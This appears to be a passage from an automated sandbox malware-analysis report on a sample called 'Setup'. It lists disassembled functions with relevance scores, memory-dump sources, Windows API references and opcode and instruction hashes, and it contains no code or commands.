                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bd70de4f725d2b3f87969070b63faebf577a9f97291e896f777f5b1ce171673
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B1228B29092509FC758DF18C84486BF7E6EFC8314F0A8A1DF999A7350DA70ED44CB96
                                                                                                                                                                                                                                                      Function 02D2D774 Relevance: 3.0, Strings: 1, Instructions: 1732COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                                      • API String ID: 118556049-1885708031
                                                                                                                                                                                                                                                      • Opcode ID: 8fdc222a090edcdf4b148e85f071cb733c741723c14d033ba46b431e1382c41d
                                                                                                                                                                                                                                                      • Instruction ID: 93274b7af707a7da54815fe781af73735d0dffc522d77331190ef269ea46bb4a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fdc222a090edcdf4b148e85f071cb733c741723c14d033ba46b431e1382c41d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA134570C01298CAEB25DF64C954BEDBBB2AF65304F1082D9D0497B291DBB55F88CFA1
                                                                                                                                                                                                                                                      Function 02D519E4 Relevance: 2.9, Strings: 1, Instructions: 1686COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: @PI
                                                                                                                                                                                                                                                      • API String ID: 118556049-979431602
                                                                                                                                                                                                                                                      • Opcode ID: 8a8a02593a051b1de7d81fc0d658ba111f76dfb43af656b9fdf8fbef12e9f5b8
                                                                                                                                                                                                                                                      • Instruction ID: b80989e85e4e2cd02174e6dbac4e3807037e194da3c2974d375586990042ce6d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a8a02593a051b1de7d81fc0d658ba111f76dfb43af656b9fdf8fbef12e9f5b8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13135870C052A89ADF26EB64CD547EDBBB1AF65304F2042D9D4482B291DBB45FC8CFA1
                                                                                                                                                                                                                                                      Function 02D56EA4 Relevance: 2.7, Strings: 2, Instructions: 249COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: @PI$eH
                                                                                                                                                                                                                                                      • API String ID: 0-1653450276
                                                                                                                                                                                                                                                      • Opcode ID: 8ae1288b4d5a01eb257e0086f21b5cd9499e3636678bd2dddf56b5a80a52d876
                                                                                                                                                                                                                                                      • Instruction ID: b4fa82ae36eff8ab0bdd525c3f07022ef42317cd38e0353dda7b97140ff32011
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ae1288b4d5a01eb257e0086f21b5cd9499e3636678bd2dddf56b5a80a52d876
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89A1B174D042A59FEF05CF68C850BEEFBB5AF59300F244169DCA0A7352D3B59945CBA0
                                                                                                                                                                                                                                                      Function 02D589B4 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: @PI$@PI
                                                                                                                                                                                                                                                      • API String ID: 0-1786480897
                                                                                                                                                                                                                                                      • Opcode ID: de021508714e3405e7dec758a9c14c513af9543447fcb0eec2a96904c10a2e17
                                                                                                                                                                                                                                                      • Instruction ID: 5847f49db1633eafb3578c82f469dd24c24894013dd7893ddedf22a881977626
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de021508714e3405e7dec758a9c14c513af9543447fcb0eec2a96904c10a2e17
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24617DB19002689BCF24DF64CC89BD9B7B5EF08710F1442D9E949B7290EB706E84CFA4
                                                                                                                                                                                                                                                      Function 02D4BD6A Relevance: 2.2, Strings: 1, Instructions: 935COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                                                      • API String ID: 118556049-2746444292
                                                                                                                                                                                                                                                      • Opcode ID: e19a34cf17b40924fe682c6f69858424a03ad7fc9397e5ba07521a90c53c22b4
                                                                                                                                                                                                                                                      • Instruction ID: b6da2ed26270737b30377e087f2200b4a431b953e5e01f9ec99ae00f07ea8f5f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e19a34cf17b40924fe682c6f69858424a03ad7fc9397e5ba07521a90c53c22b4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCA25970D05298DADF16DB68C9447DCBBB1AF29304F2482D9D4887B281DBB45F89CFA1
                                                                                                                                                                                                                                                      Function 02D4BD84 Relevance: 2.2, Strings: 1, Instructions: 924COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                                                      • API String ID: 118556049-2746444292
                                                                                                                                                                                                                                                      • Opcode ID: 6a93caa5a88a7a99f3124ceb436697cdf1f73e43ec87c0e93164a8f0a099397b
                                                                                                                                                                                                                                                      • Instruction ID: 738428d92b633e26137653287824f3667b08a6374e2478138b76f5f6567e40d4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a93caa5a88a7a99f3124ceb436697cdf1f73e43ec87c0e93164a8f0a099397b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AA25870D05298DADF16DB68C9447DCBBB1AF29304F2482D9D4487B281DBB45F89CFA1
                                                                                                                                                                                                                                                      Function 02D53C64 Relevance: 2.0, Strings: 1, Instructions: 710COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: @PI
                                                                                                                                                                                                                                                      • API String ID: 0-979431602
                                                                                                                                                                                                                                                      • Opcode ID: 5b52469ef96194e5b98a25f00978af0b456df2891b37ee0beefe8834e4dcc286
                                                                                                                                                                                                                                                      • Instruction ID: 85bc1edfcfbcde4b4c08dfc04f0f2d2e50755d8f75cd17f4c21ffac4a12509ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b52469ef96194e5b98a25f00978af0b456df2891b37ee0beefe8834e4dcc286
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F728770D042689BDF25DF24CC54BEDBBB1AF56304F1082D9D8486B2A1DBB19E88CF91
                                                                                                                                                                                                                                                      Function 031962E0 Relevance: 1.9, APIs: 1, Instructions: 356COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031966ED
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 84646dcf5b42b671b57af4e65b3e678f3a01b2b135c4e20bd29a30d0a04cb32c
                                                                                                                                                                                                                                                      • Instruction ID: 1c449420947a7bd5f897a59e8731dbfd30354acbeef473e69c41b9b11487a554
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84646dcf5b42b671b57af4e65b3e678f3a01b2b135c4e20bd29a30d0a04cb32c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3E14575D04649DFDF05CFA8C8806ADFBB0BF4D320F18826AD455AB341E731A985CBA0
                                                                                                                                                                                                                                                      Function 02D47AC4 Relevance: 1.9, APIs: 1, Instructions: 356COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D47ED1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: a7bbe72888ddd785f9ff77edeecdf551ef1efbb7be00b44b2189bebbf25e322f
                                                                                                                                                                                                                                                      • Instruction ID: 6aad9b8000a005515279590ed4ded171a8a63474ea64132fd1b6cd2a3b146f45
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7bbe72888ddd785f9ff77edeecdf551ef1efbb7be00b44b2189bebbf25e322f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AE16A71D0124ADFDB05CFA8C8806ECFBB1BF59310F188269D855EB381EB35A945CB90
                                                                                                                                                                                                                                                      Function 03195370 Relevance: 1.9, APIs: 1, Instructions: 352COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0319576B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 67997ed131910a1c36ee8317082bd69e2f4ba19a4a8a431115d98cb053146481
                                                                                                                                                                                                                                                      • Instruction ID: a49c3084f4360efcb95449e8c4fe1b4d09aa861215ba0e4f980a913174d09f77
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67997ed131910a1c36ee8317082bd69e2f4ba19a4a8a431115d98cb053146481
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6E18C74D1164ADFDF05CFA8D880AADFBB1BF49310F58825AE855EB351E730AA45CB80
                                                                                                                                                                                                                                                      Function 02D46B54 Relevance: 1.9, APIs: 1, Instructions: 352COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D46F4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 7bebd4828bf2f85323dfc5569ddf47af78ea013615cc1cd2989027e86e5cd2f2
                                                                                                                                                                                                                                                      • Instruction ID: 02793c2e1a39ebad4898486c1c5201bd393fd9330f94aef2e0a920f941c31bdc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bebd4828bf2f85323dfc5569ddf47af78ea013615cc1cd2989027e86e5cd2f2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4E16970E1125ADFCB05CFA8D880AADFBB5FF49310F148269E856E7351EB30A941CB90
                                                                                                                                                                                                                                                      Function 03195780 Relevance: 1.8, APIs: 1, Instructions: 348COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 03195B95
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 43368e3c94e440352088f8e5bf90411bf96e4ed74affdaeb0217244067a3f914
                                                                                                                                                                                                                                                      • Instruction ID: ab0a5f56168a8f8e736fd0ac31d71a4ca72c01f382e3b728b0b70873bbbcdcfa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43368e3c94e440352088f8e5bf90411bf96e4ed74affdaeb0217244067a3f914
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE13471D00649DFDB05CFA8C8806ADFBB5BF4D310F18826AE855BB391E731A985CB94
                                                                                                                                                                                                                                                      Function 02D46F64 Relevance: 1.8, APIs: 1, Instructions: 348COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D47379
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 2a20d4ec7af371f784a3b2a2c134ae294ba398b07a114db7d9800da1370b060d
                                                                                                                                                                                                                                                      • Instruction ID: 71fca5637ef7af1e0a253a7555da30eed07901c7a87fc9cf912b3a1f4445c251
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a20d4ec7af371f784a3b2a2c134ae294ba398b07a114db7d9800da1370b060d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FE16871E0164ADFDB05CFA8C8806ECFBB1BF59310F188269E855EB351EB30A945CB90
                                                                                                                                                                                                                                                      Function 03196700 Relevance: 1.8, APIs: 1, Instructions: 331COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 03196AD7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 7c71ce00b852fc10fa141fa2520254dfa27b7c8cc0498f660dde1c0e4a09f7c1
                                                                                                                                                                                                                                                      • Instruction ID: d98c5c118e19533591994012b559685c4e8889d4a96ac733bf53326ebafc068f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c71ce00b852fc10fa141fa2520254dfa27b7c8cc0498f660dde1c0e4a09f7c1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8D17C75D1065ADFDF04CFA8C890AADFBB5BF48320F54826AE855EB340E731A945CB90
                                                                                                                                                                                                                                                      Function 02D47EE4 Relevance: 1.8, APIs: 1, Instructions: 331COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D482BB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 30725ae468e64c3a87f3571974c30ac7485c91846fa9a945474d5f44db2f5290
                                                                                                                                                                                                                                                      • Instruction ID: 44db5aaef75978af1e04aa151fb07586bc6763fefd2e247246edfb287e45e074
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30725ae468e64c3a87f3571974c30ac7485c91846fa9a945474d5f44db2f5290
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39D15A71E15659DFCB05CFA8C880AADFBB1FF49310F148269E855EB381EB71A941CB90
                                                                                                                                                                                                                                                      Function 03195BA0 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 03195F34
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 40e587d15d538e3273440edd0672d4a311c22366b2bedac280147ff3d6ca3408
                                                                                                                                                                                                                                                      • Instruction ID: 9b462e09a0b50c85b7064da7d520a163d82367cf54e2c0f00501206a3d689403
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40e587d15d538e3273440edd0672d4a311c22366b2bedac280147ff3d6ca3408
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD17671D0064ADFDF05CFA8C8806ADFBB5BF89310F19825AD841BB340E771A995CB90
                                                                                                                                                                                                                                                      Function 03195F40 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031962D4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: f0fdff8fcb0d97ee81c6220a4c12fbeee8ec7e03b58bb85e62ea4ce9fdbdcbf9
                                                                                                                                                                                                                                                      • Instruction ID: 99b0da2b895287ad80ecbc5e3720da14b22cb905133dc626e07f32edf2a0a7f4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0fdff8fcb0d97ee81c6220a4c12fbeee8ec7e03b58bb85e62ea4ce9fdbdcbf9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85D16575D0064ADFDF05CFA8C8406ADFBB1BF8C310F19826AD855AB341E770A991CBA0
                                                                                                                                                                                                                                                      Function 02D47384 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D47718
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 6cec23a2c5450889af07fb7122d776d636e171bc93da161823f2ebfb22ec9d8d
                                                                                                                                                                                                                                                      • Instruction ID: 8c602477cf966874fc87ec470b8371d940cd5592e2c59144618c38121754a9df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cec23a2c5450889af07fb7122d776d636e171bc93da161823f2ebfb22ec9d8d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAD16971D0468ADFDB05CFA8C8406ADFBB1FF59310F19826AD845EB341EB70A955CB90
                                                                                                                                                                                                                                                      Function 02D47724 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D47AB8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 971b5315a3ceffc2db0584a1abd178f7f5bce64f1c7f6760ec4d79e17611e26e
                                                                                                                                                                                                                                                      • Instruction ID: 31f98057277f9ab4308e0d4692537ee7dda4433da010c986b878d54c992435a1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 971b5315a3ceffc2db0584a1abd178f7f5bce64f1c7f6760ec4d79e17611e26e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5ED16871D0468ADFDB05CFA8C8406ACFBB1BF59310F19826AD885EB351EB70A955CB90
                                                                                                                                                                                                                                                      Function 03178DE0 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?,03205040), ref: 03178E22
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskMultiPathTempWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 978242500-0
                                                                                                                                                                                                                                                      • Opcode ID: 73796fca92db82e25f36a5860de336c8699f3282a96d419687e3df2a2591e8de
                                                                                                                                                                                                                                                      • Instruction ID: bdb5df18807cafdbe62000cb9049a3e1fc4f18a3f172c3a9415256a3b59150c3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73796fca92db82e25f36a5860de336c8699f3282a96d419687e3df2a2591e8de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CD17B74D15358ABDB05EB78C9057DD7BB0AF1A308F2082CCE4056B282DBB55B89CBD6
                                                                                                                                                                                                                                                      Function 02D421D7 Relevance: 1.8, Strings: 1, Instructions: 532COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
